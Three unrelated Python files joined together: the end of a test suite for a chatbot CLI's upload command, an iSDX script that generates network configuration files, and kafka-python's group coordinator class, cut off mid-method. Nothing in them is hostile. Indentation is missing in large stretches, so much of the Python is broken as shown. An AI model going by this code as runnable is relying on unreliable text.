stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
time.sleep(1)
self.assertTrue('400' in result.stdout.read())
def test_upload_substitution(self):
self.util.it('successfully uploads a substitution file.')
bot_files = self.util.get_file_list()
self.assertFalse('test.substitution' in bot_files)
result = subprocess.Popen([
cli,
'upload',
'--app_id', config['appId'],
'--user_key', config['userKey'],
'--botname', config['botName'],
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/test.substitution')
],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
time.sleep(1)
bot_files = self.util.get_file_list()
self.assertTrue('test.substitution' in bot_files)
def test_upload_properties(self):
self.util.it('successfully uploads a properties file.')
result = subprocess.Popen([
cli,
'upload',
'--app_id', config['appId'],
'--user_key', config['userKey'],
'--botname', config['botName'],
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/test.properties')
],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
time.sleep(1)
self.util.download_file('testbot.properties')
with open(os.path.abspath(os.path.dirname(__file__) + '/test_data/test_output/testbot.properties')) as f:
f = json.load(f)
file_content = f
self.assertTrue(['name', 'Testbot'] in file_content)
self.util.delete_local_file('testbot.properties')
def test_upload_pdefaults(self):
self.util.it('successfully uploads a pdefaults file.')
bot_files = self.util.get_file_list()
try:
self.assertFalse('testbot.pdefaults' in bot_files)
except:
self.util.delete_file(filename='testbot.pdefaults')
time.sleep(1)
bot_files = self.util.get_file_list()
self.assertFalse('testbot.pdefaults' in bot_files)
result = subprocess.Popen([
cli,
'upload',
'--app_id', config['appId'],
'--user_key', config['userKey'],
'--botname', config['botName'],
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/test.pdefaults')
],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
time.sleep(1)
bot_files = self.util.get_file_list()
self.assertTrue('testbot.pdefaults' in bot_files)
self.util.delete_file(filename='testbot.pdefaults')
def test_invalid_botName(self):
self.util.it('returns 400 if the botname is invalid.')
result = subprocess.Popen([
cli, 'upload',
'--app_id', config['appId'],
'--user_key', config['userKey'],
'--botname', 'ABCDEFG',
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/test.aiml')
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.assertTrue('400' in result.stdout.read())
def test_bot_not_found(self):
self.util.it('returns 412 if the bot does not exist.')
result = subprocess.Popen([
cli, 'upload',
'--app_id', config['appId'],
'--user_key', config['userKey'],
'--botname', '123456',
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/test.aiml')
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.assertTrue('412' in result.stdout.read())
def test_invalid_userKey(self):
self.util.it('returns 401 if the user_key is invalid.')
result = subprocess.Popen([
cli, 'upload',
'--app_id', config['appId'],
'--user_key', '12345',
'--botname', config['botName'],
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/test.aiml')
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.assertTrue('401' in result.stdout.read())
def test_invalid_appId(self):
self.util.it('returns 401 if the app_id is invalid.')
result = subprocess.Popen([
cli, 'upload',
'--app_id', '12345',
'--user_key', config['userKey'],
'--botname', config['botName'],
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/test.aiml')
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.assertTrue('401' in result.stdout.read())
def tearDown(self):
self.util.delete_bot()
if __name__ == "__main__":
    # Allow running this test module directly with the unittest runner.
    unittest.main()
|
|
'''
Created on Jan 18, 2016
@author: Marc Pucci (Vencore Labs)
'''
'''
Convert simple description into json policy definitions
participants are labeled from 'a' ... and correspond to 1 ...
ports (C1, C2) correspond to 0, 1, ... are router connections from name C1
create files named 'participant_X.cfg' where X runs from a to z (participants 1 to n)
'''
import sys
import json
import os
import shutil
import collections
import tlib # iSDX parser
# Module-level knobs and shared state; main() reads these (and mutates outdir).
noisy = False  # print extra output for debugging
policies = {}  # details on participant policies (flow rules)
bh_policies = {}  # blackholing policies per participant
participants = {}  # details on each participant
outdir = 'output'  # base directory for results, will have XXXXX from XXXXX.spec added to it
template_dir = 'templates'  # directory for templates for configurations
genmini = False  # don't generate mininet sub directories for quagga
config = None  # parsed configuration
def main (argv):
global outdir
if len(argv) < 2:
print 'usage: gen_test specification_file'
exit()
cfile = argv[1]
try:
config = tlib.parser(cfile)
except Exception, e:
print 'Configuration error: ' + cfile + ': ' + repr(e)
exit()
if config.portgap():
print '\n\nWARNING: There is a gap in the port numbering - this is known to break things\n\n'
participants = config.participants
policies = config.policies
bh_policies = config.bh_policies
sdx_mininet_template = os.path.join(template_dir, config.mode + '-sdx_mininet.py')
sdx_global_template = os.path.join(template_dir, config.mode + '-sdx_global.cfg')
# inbound and outbound rules are checked in global, not in policy files
for part in participants:
p = participants.get(part)
if len(policies[part]['inbound']) != 0:
p['Inbound Rules'] = True
else:
p['Inbound Rules'] = False
if len(policies[part]['outbound']) != 0:
p['Outbound Rules'] = True
else:
p['Outbound Rules'] = False
try:
b = os.path.basename(cfile)
s = b.split('.')
b = s[0]
outdir = os.path.join(outdir, b)
os.mkdir(outdir)
print 'Output will be in ' + outdir
except:
print 'Output directory ' + outdir + ' already exists or cannot be made'
exit()
mininet_dir = os.path.join(outdir, 'mininet')
os.mkdir(mininet_dir)
if genmini:
mininet_configs_dir = os.path.join(mininet_dir, 'configs')
os.mkdir(mininet_configs_dir)
config_dir = os.path.join(outdir, 'config')
os.mkdir(config_dir)
policies_dir = os.path.join(outdir, 'policies')
os.mkdir(policies_dir)
# config.spec file
dst_file = 'config.spec'
dst_file = os.path.join(config_dir, dst_file)
print 'copying ' + cfile + ' to ' + dst_file
shutil.copy(cfile, dst_file)
# README.md file
src_file = 'test-README.md'
src_file = os.path.join(template_dir, src_file)
dst_file = 'README.md'
dst_file = os.path.join(outdir, dst_file)
print 'generating ' + dst_file + ' from ' + src_file
fin = open(src_file)
fout = open(dst_file, 'w')
for line in fin:
if '_SPECFILE_' in line:
line = line.replace('_SPECFILE_', cfile)
dprint(line, fout)
continue
if '_SPECIFICATION_' in line:
f = open(cfile)
for l in f:
dprint(l.strip('\n'), fout)
f.close()
continue
dprint(line.rstrip('\n'), fout)
fin.close()
fout.close()
# sdx_mininet.py
dst_file = 'sdx_mininet.py'
dst_file = os.path.join(mininet_dir, dst_file)
print 'copying ' + sdx_mininet_template + ' to ' + dst_file
shutil.copy(sdx_mininet_template, dst_file)
# sdnip.py - one size fits all
dst_file = 'sdnip.py'
dst_file = os.path.join(mininet_dir, dst_file)
sdnip_template = os.path.join(template_dir, 'sdnip.py')
print 'copying ' + sdnip_template + ' to ' + dst_file
shutil.copy(sdnip_template, dst_file)
# per participant policy files (flow rules)
# policy file that includes these file names
sdx_policies = {}
for p in policies:
participant_file = 'participant_' + p + '.cfg'
dir_participant_file = os.path.join(policies_dir, participant_file)
print 'generating configuration file ' + dir_participant_file
# don't include empty inbound or outbound definitions (sigh)
if len(policies[p]['outbound']) == 0:
policies[p].pop('outbound')
if len(policies[p]['inbound']) == 0:
policies[p].pop('inbound')
if noisy:
print json.dumps(policies[p], indent=4, sort_keys=True)
with open(dir_participant_file,'w') as f:
json.dump(policies[p], f, indent=4, sort_keys=True)
sdx_policies[p] = participant_file
# generate blackholing policies
for p in bh_policies:
participant_file = 'participant_' + p + '_bh.cfg'
dir_participant_file = os.path.join(policies_dir, participant_file)
print 'generating configuration file ' + dir_participant_file
# don't include empty inbound or outbound definitions (sigh)
if len(bh_policies[p]['outbound']) == 0:
bh_policies[p].pop('outbound')
if len(bh_policies[p]['inbound']) == 0:
bh_policies[p].pop('inbound')
if noisy:
print json.dumps(bh_policies[p], indent=4, sort_keys=True)
with open(dir_participant_file,'w') as f:
json.dump(bh_policies[p], f, indent=4, sort_keys=True)
policy_file = 'sdx_policies.cfg'
policy_file = os.path.join(config_dir, policy_file)
print "generating policy file " + policy_file
if noisy:
print json.dumps(sdx_policies, indent=4, sort_keys=True)
with open(policy_file,'w') as f:
json.dump(sdx_policies, f, indent=4, sort_keys=True)
# Fine Tune Participants
for p in sorted(participants):
part = participants[p]
part['Flanc Key'] = 'Part' + p + 'Key'
part['ASN'] = int(part['ASN'])
if noisy:
print json.dumps(participants, indent=4, sort_keys=True)
# sdx_global.cfg
dst_file = 'sdx_global.cfg'
dst_file = os.path.join(config_dir, dst_file)
print 'creating ' + dst_file + ' from ' + sdx_global_template
fin = open(sdx_global_template)
gc = json.load(fin)
fin.close
gc['Participants'] = participants
for p in sorted(participants):
if config.mode != 'multi-hop':
ports = []
for r in participants[p]['Ports']: # routers
ports.append(r['Id'])
#print ports
if len(ports) == 1:
gc['RefMon Settings']['fabric connections']['main'][p] = ports[0]
else:
gc['RefMon Settings']['fabric connections']['main'][p] = ports
else:
# Fabric connections are already defined in the template
pass
# there are refmon settings for the fabric that assign the next port, but it doesn't seem to be used
with open(dst_file,'w') as f:
json.dump(gc, f, indent=4, sort_keys=True)
# quagga
quagga = {}
for p in participants:
for r in participants[p]['Ports']: # routers
# print r
q = {}
q['ip'] = r['NET']
q['mac'] = r['MAC']
q['port'] = r['Id'] #switch port
if config.mode == 'multi-hop':
q['switch']= r['switch']
q['networks'] = participants[p]['networks']
q['announcements'] = participants[p]['announcements']
netnames = []
for netnumb in range(len(q['networks'])):
netnames.append(config.genname(netnumb, q['networks'][netnumb], tlib.part2as(p), r['index']))
q['netnames'] = netnames
q['asn'] = participants[p]['ASN']
# convert participant + index into a1, b1, c1, c2, etc.
hostname = tlib.part_router2host(p, r['index'])
# cmds.append('sudo python tnode.py ' + hostname) # handle in sdx_mininet.py to simplify finding tnode.py
quagga[hostname] = q
mininet_file = 'mininet.cfg'
mininet_file = os.path.join(mininet_dir, mininet_file)
print 'generating mininet configuration file ' + mininet_file
if noisy:
print json.dumps(quagga, indent=4, sort_keys=True)
with open(mininet_file,'w') as f:
json.dump(quagga, f, indent=4, sort_keys=True)
# exabgp bgp.conf file
'''
neighbor 172.0.0.22 {
description "Virtual AS C Router C2";
router-id 172.0.255.254;
local-address 172.0.255.254;
local-as 65000;
peer-as 300;
hold-time 180;
}
'''
src_exabgp_file = 'exabgp-bgp.conf'
src_exabgp_file = os.path.join(template_dir, src_exabgp_file)
dst_exabgp_file = 'bgp.conf'
dst_exabgp_file = os.path.join(config_dir, dst_exabgp_file)
print 'generating exabgp bgp.conf configuration file ' + dst_exabgp_file + ' using ' + src_exabgp_file
fin = open(src_exabgp_file)
fout = open(dst_exabgp_file, 'w')
for line in fin:
if '_NEIGHBORS_' not in line:
dprint(line.rstrip('\n'), fout)
continue
for part in sorted(participants):
p = participants[part]
for r in p['Ports']: # routers
dprint('\n\tneighbor ' + r['IP'].split('/')[0] + ' {', fout)
dprint('\t\tdescription "' + r['description'] + '";', fout)
dprint('\t\trouter-id 172.0.255.254;', fout)
dprint('\t\tlocal-address 172.0.255.254;', fout)
dprint('\t\tlocal-as 65000;', fout)
dprint('\t\tpeer-as ' + str(p['ASN']) + ';', fout)
dprint('\t\thold-time 180;', fout)
dprint('\t}', fout)
fin.close()
fout.close()
if not genmini:
return
# quagga bgpd.conf file
'''
!
! Zebra configuration saved from vty
! 2013/10/02 20:47:51
!
hostname Virtual-AS-A
password bgpd
log stdout
!
router bgp 100
bgp router-id 172.0.0.1
neighbor 172.0.255.254 remote-as 65000
neighbor 172.0.255.254 next-hop-self
network 100.0.0.0/24
network 110.0.0.0/24
redistribute static
!
line vty
!
'''
for part in sorted(participants):
p = participants[part]
for r in p['Ports']: # routers
mininet_configs_host_dir = os.path.join(mininet_configs_dir, r['hostname'])
os.mkdir(mininet_configs_host_dir)
src_quagga_file = 'quagga-bgpd.conf'
dst_quagga_file = 'bgpd.conf'
dst_quagga_file = os.path.join(mininet_configs_host_dir, dst_quagga_file)
src_quagga_file = os.path.join(template_dir, src_quagga_file)
print 'generating quagga bgpd.conf configuration file ' + dst_quagga_file + ' using ' + src_quagga_file
fin = open(src_quagga_file)
fout = open(dst_quagga_file, 'w')
for line in fin:
if '_NETWORKS_' in line:
for a in p['announce']:
dprint(' network ' + a, fout)
continue
if '_ASN_' in line:
line = line.replace('_ASN_', str(p['ASN']))
dprint(line, fout)
continue
if '_DESCRIPTION_' in line:
line = line.replace('_DESCRIPTION_', r['description'].replace(' ', '-'))
dprint(line, fout)
continue
if '_IP_' in line:
line = line.replace('_IP_', r['IP'])
dprint(line, fout)
continue
dprint(line.rstrip('\n'), fout)
fin.close()
fout.close()
# zebra
src_quagga_file = 'quagga-zebra.conf'
dst_quagga_file = 'zebra.conf'
dst_quagga_file = os.path.join(mininet_configs_host_dir, dst_quagga_file)
src_quagga_file = os.path.join(template_dir, src_quagga_file)
print 'generating quagga zebra.conf configuration file ' + dst_quagga_file + ' using ' + src_quagga_file
fin = open(src_quagga_file)
fout = open(dst_quagga_file, 'w')
for line in fin:
if '_HOSTNAME_' in line:
line = line.replace('_HOSTNAME_', r['description'].replace(' ', '-'))
dprint(line, fout)
continue
if '_HOST_' in line:
line = line.replace('_HOST_', r['hostname'])
dprint(line, fout)
continue
dprint(line.rstrip('\n'), fout)
fin.close()
fout.close()
copylist = ( ('quagga-daemons', 'daemons'),
('quagga-debian.conf', 'debian.conf')
)
for c in copylist:
src_file = os.path.join(template_dir, c[0])
dst_file = os.path.join(mininet_configs_host_dir, c[1])
print 'copying ' + src_file + ' to ' + dst_file
shutil.copy(src_file, dst_file)
def dprint (line, fout):
if noisy:
print line
fout.write(line + '\n')
if __name__ == "__main__":
    # Run as a script: argv[1] names the .spec file to convert.
    main(sys.argv)
|
|
import abc
import copy
import logging
import time
import six
import kafka.common as Errors
from kafka.future import Future
from kafka.protocol.commit import (GroupCoordinatorRequest,
OffsetCommitRequest_v2 as OffsetCommitRequest)
from kafka.protocol.group import (HeartbeatRequest, JoinGroupRequest,
LeaveGroupRequest, SyncGroupRequest)
from .heartbeat import Heartbeat
log = logging.getLogger('kafka.coordinator')
class BaseCoordinator(object):
"""
BaseCoordinator implements group management for a single group member
by interacting with a designated Kafka broker (the coordinator). Group
semantics are provided by extending this class. See ConsumerCoordinator
for example usage.
From a high level, Kafka's group management protocol consists of the
following sequence of actions:
1. Group Registration: Group members register with the coordinator providing
their own metadata (such as the set of topics they are interested in).
2. Group/Leader Selection: The coordinator selects the members of the group
and chooses one member as the leader.
3. State Assignment: The leader collects the metadata from all the members
of the group and assigns state.
4. Group Stabilization: Each member receives the state assigned by the
leader and begins processing.
To leverage this protocol, an implementation must define the format of
metadata provided by each member for group registration in group_protocols()
and the format of the state assignment provided by the leader in
_perform_assignment() and which becomes available to members in
_on_join_complete().
"""
DEFAULT_CONFIG = {
'group_id': 'kafka-python-default-group',
'session_timeout_ms': 30000,
'heartbeat_interval_ms': 3000,
'retry_backoff_ms': 100,
}
def __init__(self, client, **configs):
    """
    Keyword Arguments:
        group_id (str): name of the consumer group to join for dynamic
            partition assignment (if enabled), and to use for fetching and
            committing offsets. Default: 'kafka-python-default-group'
        session_timeout_ms (int): The timeout used to detect failures when
            using Kafka's group management facilities. Default: 30000
        heartbeat_interval_ms (int): The expected time in milliseconds
            between heartbeats to the consumer coordinator when using
            Kafka's group management feature. Heartbeats are used to ensure
            that the consumer's session stays active and to facilitate
            rebalancing when new consumers join or leave the group. The
            value must be set lower than session_timeout_ms, but typically
            should be set no higher than 1/3 of that value. It can be
            adjusted even lower to control the expected time for normal
            rebalances. Default: 3000
        retry_backoff_ms (int): Milliseconds to backoff when retrying on
            errors. Default: 100.
    """
    # Start from the class defaults and overlay only recognized keys;
    # unrecognized kwargs are silently ignored.
    self.config = copy.copy(self.DEFAULT_CONFIG)
    for key in self.config:
        if key in configs:
            self.config[key] = configs[key]
    self._client = client
    # Sentinels until the first successful JoinGroup response.
    self.generation = OffsetCommitRequest.DEFAULT_GENERATION_ID
    self.member_id = JoinGroupRequest.UNKNOWN_MEMBER_ID
    self.group_id = self.config['group_id']
    self.coordinator_id = None  # broker node id; None means unknown
    self.rejoin_needed = True
    self.needs_join_prepare = True
    self.heartbeat = Heartbeat(**self.config)
    self.heartbeat_task = HeartbeatTask(self)
    #self.sensors = GroupCoordinatorMetrics(metrics, metric_group_prefix, metric_tags)
@abc.abstractmethod
def protocol_type(self):
    """
    Unique identifier for the class of protocols implemented
    (e.g. "consumer" or "connect").
    Returns:
        str: protocol type name
    """
    pass  # abstract -- subclasses must implement
@abc.abstractmethod
def group_protocols(self):
    """Return the list of supported group protocols and metadata.
    This list is submitted by each group member via a JoinGroupRequest.
    The order of the protocols in the list indicates the preference of the
    protocol (the first entry is the most preferred). The coordinator takes
    this preference into account when selecting the generation protocol
    (generally more preferred protocols will be selected as long as all
    members support them and there is no disagreement on the preference).
    Note: metadata must be type bytes or support an encode() method
    Returns:
        list: [(protocol, metadata), ...]
    """
    pass  # abstract -- subclasses must implement
@abc.abstractmethod
def _on_join_prepare(self, generation, member_id):
    """Invoked prior to each group join or rejoin.
    This is typically used to perform any cleanup from the previous
    generation (such as committing offsets for the consumer)
    Arguments:
        generation (int): The previous generation or -1 if there was none
        member_id (str): The identifier of this member in the previous group
            or '' if there was none
    """
    pass  # abstract hook -- subclasses must implement
@abc.abstractmethod
def _perform_assignment(self, leader_id, protocol, members):
    """Perform assignment for the group.
    This is used by the leader to push state to all the members of the group
    (e.g. to push partition assignments in the case of the new consumer)
    Arguments:
        leader_id (str): The id of the leader (which is this member)
        protocol (str): the chosen group protocol (assignment strategy)
        members (list): [(member_id, metadata_bytes)] from
            JoinGroupResponse. metadata_bytes are associated with the chosen
            group protocol, and the Coordinator subclass is responsible for
            decoding metadata_bytes based on that protocol.
    Returns:
        dict: {member_id: assignment}; assignment must either be bytes
            or have an encode() method to convert to bytes
    """
    pass  # abstract -- only invoked on the elected leader
@abc.abstractmethod
def _on_join_complete(self, generation, member_id, protocol,
                      member_assignment_bytes):
    """Invoked when a group member has successfully joined a group.
    Arguments:
        generation (int): the generation that was joined
        member_id (str): the identifier for the local member in the group
        protocol (str): the protocol selected by the coordinator
        member_assignment_bytes (bytes): the protocol-encoded assignment
            propagated from the group leader. The Coordinator instance is
            responsible for decoding based on the chosen protocol.
    """
    pass  # abstract hook -- subclasses must implement
def coordinator_unknown(self):
"""Check if we know who the coordinator is and have an active connection
Side-effect: reset coordinator_id to None if connection failed
Returns:
bool: True if the coordinator is unknown
"""
if self.coordinator_id is None:
return True
if self._client.is_disconnected(self.coordinator_id):
self.coordinator_dead()
return True
return not self._client.ready(self.coordinator_id)
def ensure_coordinator_known(self):
    """Block until the coordinator for this group is known
    (and we have an active connection -- java client uses unsent queue).
    """
    while self.coordinator_unknown():
        # Dont look for a new coordinator node if we are just waiting
        # for connection to finish
        if self.coordinator_id is not None:
            self._client.poll()
            continue
        future = self._send_group_metadata_request()
        self._client.poll(future=future)
        if future.failed():
            if future.retriable():
                # Transient lookup failure: refresh cluster metadata and
                # loop to retry the coordinator discovery.
                metadata_update = self._client.cluster.request_update()
                self._client.poll(future=metadata_update)
            else:
                raise future.exception # pylint: disable-msg=raising-bad-type
def need_rejoin(self):
"""Check whether the group should be rejoined (e.g. if metadata changes)
Returns:
bool: True if it should, False otherwise
"""
return self.rejoin_needed
def ensure_active_group(self):
    """Ensure that the group is active (i.e. joined and synced)"""
    if not self.need_rejoin():
        return
    # Run the prepare hook at most once per rejoin cycle.
    if self.needs_join_prepare:
        self._on_join_prepare(self.generation, self.member_id)
        self.needs_join_prepare = False
    while self.need_rejoin():
        self.ensure_coordinator_known()
        future = self._perform_group_join()
        self._client.poll(future=future)
        if future.succeeded():
            member_assignment_bytes = future.value
            self._on_join_complete(self.generation, self.member_id,
                                   self.protocol, member_assignment_bytes)
            self.needs_join_prepare = True
            self.heartbeat_task.reset()
        else:
            assert future.failed()
            exception = future.exception
            # These errors mean our membership info is stale; retry the
            # join immediately without backing off.
            if isinstance(exception, (Errors.UnknownMemberIdError,
                                      Errors.RebalanceInProgressError,
                                      Errors.IllegalGenerationError)):
                continue
            elif not future.retriable():
                raise exception # pylint: disable-msg=raising-bad-type
            # Retriable error: back off before the next join attempt.
            time.sleep(self.config['retry_backoff_ms'] / 1000.0)
def _perform_group_join(self):
    """Join the group and return the assignment for the next generation.
    This function handles both JoinGroup and SyncGroup, delegating to
    _perform_assignment() if elected leader by the coordinator.
    Returns:
        Future: resolves to the encoded-bytes assignment returned from the
            group leader
    """
    if self.coordinator_unknown():
        e = Errors.GroupCoordinatorNotAvailableError(self.coordinator_id)
        return Future().failure(e)
    # send a join group request to the coordinator
    log.debug("(Re-)joining group %s", self.group_id)
    request = JoinGroupRequest(
        self.group_id,
        self.config['session_timeout_ms'],
        self.member_id,
        self.protocol_type(),
        # metadata may already be bytes or may expose encode(); normalize
        [(protocol,
          metadata if isinstance(metadata, bytes) else metadata.encode())
         for protocol, metadata in self.group_protocols()])
    # create the request for the coordinator
    log.debug("Issuing request (%s) to coordinator %s", request, self.coordinator_id)
    future = Future()
    _f = self._client.send(self.coordinator_id, request)
    _f.add_callback(self._handle_join_group_response, future)
    _f.add_errback(self._failed_request, self.coordinator_id,
                   request, future)
    return future
def _failed_request(self, node_id, request, future, error):
    # Generic errback for coordinator-bound requests: assume the
    # connection is bad, force coordinator re-discovery, and propagate
    # the original error to the caller's future.
    log.error('Error sending %s to node %s [%s] -- marking coordinator dead',
              request.__class__.__name__, node_id, error)
    self.coordinator_dead()
    future.failure(error)
def _handle_join_group_response(self, future, response):
    # Dispatch on the JoinGroup error code: on success record the new
    # membership and proceed to SyncGroup (leader or follower path);
    # on error fail `future` so the join loop can decide how to retry.
    error_type = Errors.for_code(response.error_code)
    if error_type is Errors.NoError:
        self.member_id = response.member_id
        self.generation = response.generation_id
        self.rejoin_needed = False
        self.protocol = response.group_protocol
        log.info("Joined group '%s' (generation %s) with member_id %s",
                 self.group_id, self.generation, self.member_id)
        #self.sensors.join_latency.record(response.requestLatencyMs())
        if response.leader_id == response.member_id:
            log.info("Elected group leader -- performing partition"
                     " assignments using %s", self.protocol)
            self._on_join_leader(response).chain(future)
        else:
            self._on_join_follower().chain(future)
    elif error_type is Errors.GroupLoadInProgressError:
        log.debug("Attempt to join group %s rejected since coordinator is"
                  " loading the group.", self.group_id)
        # backoff and retry
        future.failure(error_type(response))
    elif error_type is Errors.UnknownMemberIdError:
        # reset the member id and retry immediately
        error = error_type(self.member_id)
        self.member_id = JoinGroupRequest.UNKNOWN_MEMBER_ID
        log.info("Attempt to join group %s failed due to unknown member id,"
                 " resetting and retrying.", self.group_id)
        future.failure(error)
    elif error_type in (Errors.GroupCoordinatorNotAvailableError,
                        Errors.NotCoordinatorForGroupError):
        # re-discover the coordinator and retry with backoff
        self.coordinator_dead()
        log.info("Attempt to join group %s failed due to obsolete "
                 "coordinator information, retrying.", self.group_id)
        future.failure(error_type())
    elif error_type in (Errors.InconsistentGroupProtocolError,
                        Errors.InvalidSessionTimeoutError,
                        Errors.InvalidGroupIdError):
        # log the error and re-throw the exception
        error = error_type(response)
        log.error("Attempt to join group %s failed due to: %s",
                  self.group_id, error)
        future.failure(error)
    elif error_type is Errors.GroupAuthorizationFailedError:
        future.failure(error_type(self.group_id))
    else:
        # unexpected error, throw the exception
        error = error_type()
        log.error("Unexpected error in join group response: %s", error)
        future.failure(error)
def _on_join_follower(self):
    # send follower's sync group with an empty assignment
    # (only the elected leader sends a populated assignment map)
    request = SyncGroupRequest(
        self.group_id,
        self.generation,
        self.member_id,
        {})
    log.debug("Issuing follower SyncGroup (%s) to coordinator %s",
              request, self.coordinator_id)
    return self._send_sync_group_request(request)
def _on_join_leader(self, response):
    """
    Perform leader synchronization and send back the assignment
    for the group via SyncGroupRequest
    Arguments:
        response (JoinResponse): broker response to parse
    Returns:
        Future: resolves to member assignment encoded-bytes
    """
    try:
        group_assignment = self._perform_assignment(response.leader_id,
                                                    response.group_protocol,
                                                    response.members)
    except Exception as e:
        # assignment is subclass/user code -- surface any failure on the future
        return Future().failure(e)
    request = SyncGroupRequest(
        self.group_id,
        self.generation,
        self.member_id,
        # assignments may already be bytes or may expose encode(); normalize
        [(member_id,
          assignment if isinstance(assignment, bytes) else assignment.encode())
         for member_id, assignment in six.iteritems(group_assignment)])
    log.debug("Issuing leader SyncGroup (%s) to coordinator %s",
              request, self.coordinator_id)
    return self._send_sync_group_request(request)
def _send_sync_group_request(self, request):
    # SyncGroup must go to the active coordinator; fail fast when unknown.
    if self.coordinator_unknown():
        return Future().failure(Errors.GroupCoordinatorNotAvailableError())
    future = Future()
    _f = self._client.send(self.coordinator_id, request)
    _f.add_callback(self._handle_sync_group_response, future)
    _f.add_errback(self._failed_request, self.coordinator_id,
                   request, future)
    return future
def _handle_sync_group_response(self, future, response):
    # On success resolve the future with the raw member assignment bytes;
    # any error forces a rejoin and fails the future.
    error_type = Errors.for_code(response.error_code)
    if error_type is Errors.NoError:
        log.debug("Received successful sync group response for group %s: %s",
                  self.group_id, response)
        #self.sensors.syncLatency.record(response.requestLatencyMs())
        future.success(response.member_assignment)
        return
    # Always rejoin on error
    self.rejoin_needed = True
    if error_type is Errors.GroupAuthorizationFailedError:
        future.failure(error_type(self.group_id))
    elif error_type is Errors.RebalanceInProgressError:
        log.info("SyncGroup for group %s failed due to coordinator"
                 " rebalance, rejoining the group", self.group_id)
        future.failure(error_type(self.group_id))
    elif error_type in (Errors.UnknownMemberIdError,
                        Errors.IllegalGenerationError):
        # stale membership info: drop our member id before rejoining
        error = error_type()
        log.info("SyncGroup for group %s failed due to %s,"
                 " rejoining the group", self.group_id, error)
        self.member_id = JoinGroupRequest.UNKNOWN_MEMBER_ID
        future.failure(error)
    elif error_type in (Errors.GroupCoordinatorNotAvailableError,
                        Errors.NotCoordinatorForGroupError):
        error = error_type()
        log.info("SyncGroup for group %s failed due to %s, will find new"
                 " coordinator and rejoin", self.group_id, error)
        self.coordinator_dead()
        future.failure(error)
    else:
        error = error_type()
        log.error("Unexpected error from SyncGroup: %s", error)
        future.failure(error)
def _send_group_metadata_request(self):
    """Discover the current coordinator for the group.
    Returns:
        Future: resolves to the node id of the coordinator
    """
    # Any ready broker can answer a coordinator lookup; use the least loaded.
    node_id = self._client.least_loaded_node()
    if node_id is None or not self._client.ready(node_id):
        return Future().failure(Errors.NoBrokersAvailable())
    log.debug("Issuing group metadata request to broker %s", node_id)
    request = GroupCoordinatorRequest(self.group_id)
    future = Future()
    _f = self._client.send(node_id, request)
    _f.add_callback(self._handle_group_coordinator_response, future)
    _f.add_errback(self._failed_request, node_id, request, future)
    return future
def _handle_group_coordinator_response(self, future, response):
    log.debug("Group metadata response %s", response)
    if not self.coordinator_unknown():
        # We already found the coordinator, so ignore the request
        log.debug("Coordinator already known -- ignoring metadata response")
        future.success(self.coordinator_id)
        return
    error_type = Errors.for_code(response.error_code)
    if error_type is Errors.NoError:
        ok = self._client.cluster.add_group_coordinator(self.group_id, response)
        if not ok:
            # This could happen if coordinator metadata is different
            # than broker metadata
            future.failure(Errors.IllegalStateError())
            return
        self.coordinator_id = response.coordinator_id
        # initiate a connection to the newly discovered coordinator
        self._client.ready(self.coordinator_id)
        # start sending heartbeats only if we have a valid generation
        if self.generation > 0:
            self.heartbeat_task.reset()
        future.success(self.coordinator_id)
    elif error_type is Errors.GroupCoordinatorNotAvailableError:
        log.debug("Group Coordinator Not Available; retry")
        future.failure(error_type())
    elif error_type is Errors.GroupAuthorizationFailedError:
        error = error_type(self.group_id)
        log.error("Group Coordinator Request failed: %s", error)
        future.failure(error)
    else:
        error = error_type()
        log.error("Unrecognized failure in Group Coordinator Request: %s",
                  error)
        future.failure(error)
def coordinator_dead(self, error=None):
"""Mark the current coordinator as dead."""
if self.coordinator_id is not None:
log.info("Marking the coordinator dead (node %s): %s.",
self.coordinator_id, error)
self.coordinator_id = None
def close(self):
    """Close the coordinator, leave the current group
    and reset local generation/memberId."""
    try:
        self._client.unschedule(self.heartbeat_task)
    except KeyError:
        # heartbeat task was not scheduled; nothing to cancel
        pass
    if not self.coordinator_unknown() and self.generation > 0:
        # this is a minimal effort attempt to leave the group. we do not
        # attempt any resending if the request fails or times out.
        request = LeaveGroupRequest(self.group_id, self.member_id)
        future = self._client.send(self.coordinator_id, request)
        future.add_callback(self._handle_leave_group_response)
        future.add_errback(log.error, "LeaveGroup request failed: %s")
        self._client.poll(future=future)
    # Reset to the pre-join sentinels so later use rejoins cleanly.
    self.generation = OffsetCommitRequest.DEFAULT_GENERATION_ID
    self.member_id = JoinGroupRequest.UNKNOWN_MEMBER_ID
    self.rejoin_needed = True
def _handle_leave_group_response(self, response):
    # Leaving is best-effort, so this handler only logs the outcome.
    error_type = Errors.for_code(response.error_code)
    if error_type is Errors.NoError:
        log.info("LeaveGroup request succeeded")
    else:
        log.error("LeaveGroup request failed: %s", error_type())
def _send_heartbeat_request(self):
    """Send a heartbeat request
    Returns:
        Future: resolves to None on a successful heartbeat
    """
    request = HeartbeatRequest(self.group_id, self.generation, self.member_id)
    log.debug("Heartbeat: %s[%s] %s", request.group, request.generation_id, request.member_id) #pylint: disable-msg=no-member
    future = Future()
    _f = self._client.send(self.coordinator_id, request)
    _f.add_callback(self._handle_heartbeat_response, future)
    _f.add_errback(self._failed_request, self.coordinator_id,
                   request, future)
    return future
def _handle_heartbeat_response(self, future, response):
    """Translate a HeartbeatResponse error code into future resolution
    and local group-membership state changes."""
    #self.sensors.heartbeat_latency.record(response.requestLatencyMs())
    error_type = Errors.for_code(response.error_code)
    if error_type is Errors.NoError:
